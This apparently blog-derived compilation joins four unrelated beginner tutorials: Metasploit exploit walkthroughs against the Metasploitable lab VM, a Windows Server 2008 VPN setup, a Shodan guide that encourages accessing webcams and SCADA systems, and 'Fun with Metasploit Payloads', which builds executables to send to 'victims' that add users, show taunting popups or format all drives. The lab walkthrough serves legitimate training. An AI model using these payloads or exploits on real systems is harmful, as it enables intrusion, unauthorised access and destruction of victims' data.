Penetration Testing Skills Practice with Metasploitable (Beginner Guide)

Metasploitable is a voluntarily created vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities Based virtual machine which helps us to conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware products and other visualization technologies such as 
VirtualBox. You can download metasploitable from--> https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploit table is an exploitable framework which help us to improve our skills and also help use to use every port to our advantage as we all know that ports and protocols are the foundation of hacking so, therefore, the more you can take benefit off of the victim.


In this we will walk through the whole concept of metasploitable including how to install it and how to hack it step by step. We will take all the ports one by one which re vulnerable and try to exploit them. So, firstly you have to download metasploit from the above link. After the downloading is complete open VMware and click on Open a virtual machine. 


Locate the VMware image of metasploitable that you just downloaded and click on OK.


After clicking on OK the metasploitable will open in virtual machine and to run it just click on Power on this virtual machine and it will run your metasploitable.


On the verge of getting started it will ask you for username and password. Now, by default the username and passwords are: msfadmin and msfadmin respectively. Once you enter username and password your metasploitable will start.

Now that our vulnerable Linux machine is running and we can type the ifconfig command to retrieve the IP address 


Now for penetration testing on the metasploitable go to the terminal of your Kali Linux and scan the IP of metasploitable through nmap so that we can which ports are open and this type:
nmap -sV 192.168.1.106


Due to the nmap command we can see which port is open and which service is going on which port, therefore, we can start our attack one by one to every vulnerable port. So, first we will attack on vsftpd2.3.4. As we know that this version is vulnerable, so let us exploit it. For this, open metasploit and type:
search vsftpd 2.3.4


Typing the above command will show the exploits that will help you in attack the said version. So further type:

 use exploit/unix/ftp/vsftpd_234_backdoor
set rhost 192.168.1.106
set rport 21
exploit

Once your attack is executed, you will reach in the shell of the metasploitable and so now you can do as you deserve.
Now, we will exploit ssh which works on port number 22. There is already existing exploit for this port. It will help us to apply dictionary attack to crack the password of metasploitable and so we will use it as :
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.106
set rport 22
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


As you can see, after the execution of the file it will start matching all the username with the passwords to find the correct one. And in the end you will have your password along with the username.
Now we can use that password to the shell of metasploitable and for this just got to the terminal of Kali and type:
ssh msfadmin@192.168.1.106
Here,
ssh --> is the service through which we are exploiting
msfadmin --> is the password
192.168.1.106 --> is the victim's IP address


Upon execution you can see that you will automatically enter its shell.
Now, we will try and attack via telnet which works on port 23. This port will also help us to find password first and then we can enter its shell. So, for this type:
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.106
set rport 23
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


Similarly, as ssh, it will also start dictionary attack and step by step it will find the correct password. Now that you have the password you can log on to metasploitable.

telnet 192.168.1.106
After typing so, it will ask you for the username and password and once you enter these you will enter the metasploitable as shown below:


Now we will try to exploit the port number 80 on which http services run. For this too there is a pre-installed exploit in metasploit and to exercise the said exploit type:

use exploit/multi/http/php_cgi_arg_injection
set rhost 192.168.1.106
set rport 80
exploit


After the execution you will enter a meterpreter session of metasploitable as shown.
Next we will try to exploit the samba service that is going on the port number 139. For that we will use the following exploit:

use exploit/multi/samba/usermap_script
set rhost 192.168.1.106
set rport 139
exploit


The execution of this will take you the shell session of metasploit that means you will reach the shell of metasploit.
Now, we will use the following exploit:
use exploit/multi/misc/java_rmi_server
set rhost 192.168.1.106
set rport 1899
exploit


Again, after you hit enter button on your keyboard you will have a meterpreter session.
The next exploit is:
use exploit/linux/postgres/postgres_payload
set rhost 192.168.1.106
set rport 5432
exploit


Once the command is executed you will enter the meterpreter session as shown above.
The exploit that use is related to unreal ircd and to search its exploit type :
search Unreal ircd
And the result will be exploits which will help you to attack the victim. As you can see there are three exploits and we will use the latest one.


To the exploit type:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.1.106
set rport 6667
exploit



Setup VPN Penetration Testing Lab in Server 2008

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on client depending on the way you want to use the remote access VPN server.


 Start -> Administrative Tools -> Server Manager. Click Add Roles


This wizard helps you install roll on your server, click on next to continue


Check the status of “Network Policy Server” under Role Services and click on next.
               
Network policy and access services provides Network Policy server (NPS), Routing and Remote Access (RRAS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP) ,which help safeguard the health and security of your network.


Read the requirements and click “Next” to continue.


On the following screen “Select Role Services” for Network Policy and Access Service, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click next to continue.


To install following role services for Network Policy and Access Service click on Install.


This show the summary of Remote Access services and Routing were installed successfully. Once the installation finishes, click close to end the wizard.
Till here I have completed installation of VPN in server.


To complete configuration in Routing and Remote Access follow these step.
Start -> Administrative Tools ->Routing and Remote Access


In the console that opens, right click your server name and right click on “Configure and Enable Routing and Remote Access “this configures Routing and Remote Access on the selected server.


In the Wizard you can enable any of following combinations of services. I will choose Custom Configuration for my server and click on Next.

Next is Routing and Remote Access server setup wizard in which I am going to decide which type of access should be allows to client to access server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the Check Box VPN access service on this server and click on next to continue

Now you have successfully completed the task of VPN access service in your server, to close this wizard click on finish.


Now you will get the dialog box which shows message that Routing and Remote Access service is ready to use. So click on Start Service.


Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.


Once you have successfully configuration of Routing and Remote, the administrator will select the desire user and give privilege to access the server through VPN connection for connecting client from different location.

 Start -> Administrative Tools -> Active Directory Users and Computers -> Right Click the properties of an user


Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click on Apply and Ok to finish. Only selected client will be able to connect with server network through VPN using different network.

This was first phase of VPN configuration on server-side performs by administrator.


SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on the Start -> Control Panel ->Network and Internet -> Network and Sharing Center
Change your network settings click on setup a new connection or network option, this contains different types of network connection options like broadband, dial-up, VPN or set up a router or access point.



 Here you can many other options as I told, I will choose connect to a workplace to set a dial-up or VPN connections to your workplace. This option will set the connection to a workplace or say to our server for the client.



Now you will see next wizard for connect to workplace, which will ask for type of connection through which you will connect to your workplace or server.
My option will be use my internet connection (VPN) and the will be established using internet.


Now for connecting network you must aware of IP address of workplace or say server. 192.168.0.106 it is the IP of my windows server 2008 r2 having VPN setup and configuration ,so I have mention this IP in Internet Address for connection.


Now I had set privilege for user pentest to Allow Access for VPN connection. When you will try to connect it will ask for your credentials for authentication. Client will enter his username and password for establishing connection and click on connect.


When given credential will be found authorized, it will allow client to connect with workplace and provide VPN connection.

This is unshared and secure connection over internet between client and server for sharing data in a transparent medium


To ensure that you have successful VPN connection open your command promot and type ipconfig this show another IP over LAN.

My IP is 192.168.0.104 under PPP adapter VPN connection, which will be used for login in server to access network and share data, as I am also having my LAN IP 192.168.0.105. This shows my VPN connection is established successfully

Shodan a Search Engine for Hackers (Beginner Tutorial)

Many people have described Shodan as a search engine for hackers, and have even called it "the world's most dangerous search engine". It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?
Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and  very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have to first register to it.


Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.
Here are some examples for which you can use shodan to search up the things you want.
Webcam
When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :


Traffic Signals
Seaching about traffic signals or traffic signaks camera then it will show you all the traffic survallaince camera present.


Cisco
Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :


Scada
You can also search about Scada and you will get its information arround the whole world as shown :


netcam
Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.


GPS
Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.


Port
Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :


When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.

Fun with Metasploit Payloads

Ordinarily small things have no use but whenever it comes up to their greater relevance then at certain point of time it has a universalized impact and can create a complex situation. And this article is about some simple payloads that can help us to muddle with our victim. Hence, leaving a mark behind.
Moreover metasploit is not about hacking but it’s also about hacking in style. There are a lot of payloads that are too good to not to use. These payloads are like small droplets in an ocean but still they matter and there are only handful of people who about these payloads. Also so far we have only learnt about hardcore metasploit but let’s see what more cools things it has to show us.

Add User
Moving forward, let us learn how to make such payloads, open metasploit and use windows/adduser payload. This payload lets you create another user in your victim's PC. The commands are:

use windows/adduser
set user raaz
set pass Ignite@123
set wmic true

generate -t exe -f /root/Desktop/user.exe


With the execution of above command, a new user will be created in your victim's PC. And you can go to the shell of your victim's PC and see the result. And to see the user’s type:
net user


Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on victim's PC. The message can be anything you want along with title. To create this payload again open metasploit and use windows/messagebox. The commands are:
use windows/messagebox
set text you have been hacked
set tittle Important Message
generate -t exe -f /root/Desktop/message.exe


And your payload is created. When you will send it and once the victim will open it then a pop-up message box will appear displaying your message like the following one:


Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are :

use windows/format_all_drives
set vlomelabel 3
generate -t exe -f /root/Desktop/format.exe


When the payload is sent and opened, it formats their drive.
Speak
Another such payload is speak_pwned. This payload is a one-line command payload which creates an audio saying "you have been pawned" and now when the victim will open it then this audio will be played for him/her. And it's command is :
generate -t exe -f /root/Desktop/speak.exe


So that is how you can use different payloads to mess with your victim. Also you can create this payload and keep it safe with you so that you can use it whenever you want. And please note that all these payloads are post payloads to make these work you need to first hack your victim.

This way even the smaller things will make a difference; after all even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.